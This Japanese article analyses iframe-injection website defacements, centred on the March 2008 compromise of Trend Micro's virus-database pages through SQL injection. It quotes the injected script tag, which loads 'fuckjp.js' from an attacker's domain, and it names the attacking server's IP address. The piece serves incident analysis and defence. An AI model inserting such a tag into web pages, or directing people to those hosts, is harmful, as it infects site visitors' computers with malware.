Webページに不正なコードを埋め込んで,閲覧したユーザーのパソコンにウイルスを感染させる攻撃が年々増加している。手法は一つのブラウザ画面を分割して複数のコンテンツを表示させるためのiframeタグを悪用する「iframeインジェクション」である。Webページへの不正コードの挿入には,SQLインジェクションやFTPが悪用されることが多い。SQLインジェクションは,閲覧者からの入力文字をSQL文として受け付けてしまうWebアプリケーションのぜい弱性を突く攻撃である。
iframeインジェクション攻撃が関心を集めるようになったのは,2007年に欧州を中心に起こったMPack(攻撃ツール)騒動からだ。しかし日本国内での被害報告が少なかったためか,国内ではそれほど話題にはならなかった。
実は筆者は,SQLインジェクションによるWebページ改ざんを,日本でも2005年の初頭から確認している。ただ,いずれも単発であり,海外事例のような多数サイトの改ざんには至っていない。ところが今年3月,事件が突如として多発した。その中で最も話題になったのがトレンドマイクロのWebページ・ハッキング事件で,世界中のメディアが報道した。
攻撃には「日本向け」のサイン
トレンドマイクロは3月12日,Webページが改ざんされたことを明らかにした。同社が管理する「ウイルスデータベース」の一部コンテンツに,不正なJavaScriptが挿入されたのである。具体的には,iframeタグを記述した「<script src=http://www.2117966.net/fuckjp.js></script>」というJavaScriptを埋め込まれた。iframeタグをコンテンツに直接ではなく,「fuckjp.js」というスクリプトに埋め込んでいる点は,海外事例ではあまり見ない傾向である。このページの閲覧者は,悪性コードが設置されているWebサイトを知らないうちに参照させられ,不正プログラムをインストールされる。
スクリプトの名称などからすると,これは日本への標的型攻撃と推測される。実際には,同様の攻撃が世界中のWebサイトに仕掛けられた。Googleのキャッシュから考察すると,攻撃は3月7日頃(日本時間)には既に始まっていて,3月10日から12日にかけて多数のサイトが改ざんされたことと推測できる(写真1)。Google検索によると,攻撃を受けたサイトは2万件を超える(検索結果をクリックすると危険なので要注意)。ただ12日の午後あたりから,「fuckjp.js」が「fuckjp0.js」に変わり,こちらは日本語サイトだけを狙った攻撃となった。日本が標的となったことは間違いなさそうだ。
使われた攻撃ツールは中国産?
今回の攻撃では,攻撃者は「125.46.105.224」というIPアドレスのサーバーからSQLインジェクションを実行した(図1)。そしてfuckjp.jsに記述したiframeタグにより同サーバーに設置した悪意あるコードを参照させ,ブラウザなどのぜい弱性を攻撃してシステムの権限を奪取する(図2)。
